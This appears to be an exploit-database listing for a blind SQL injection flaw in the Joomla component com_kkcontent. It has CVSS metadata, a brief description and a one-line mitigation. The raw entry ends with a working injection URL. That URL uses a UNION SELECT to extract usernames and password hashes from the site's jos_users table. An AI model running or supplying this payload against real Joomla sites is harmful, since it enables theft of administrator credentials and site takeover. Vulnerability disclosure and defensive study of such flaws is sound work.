header-logo
Suggest Exploit
vendor:
com_kkcontent
by:
Pyske
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: com_kkcontent
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_kkcontent Blind SQL Injection Vulnerability

This vulnerability allows an attacker to gain access to admin login credentials by exploiting a bug in the com_kkcontent component of Joomla. The bug occurs when malicious characters are not filtered properly.

Mitigation:

Filter out malicious characters.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
# Joomla Component com_kkcontent Blind SQL Injection Vulnerability
#############################################################

# Author : Pyske

# Home : www.cyber-warrior.org

# Greetz : Fl0riX , M-K-A and All Cyber-Warrior

# Name : com_kkcontent

# Bug Type : Blind SQL Injection

# Infection : Admin login bilgileri al?nabilir.


# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path /index.php?option=com_kkcontent&catID=9/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users--

< -- bug code end of -- >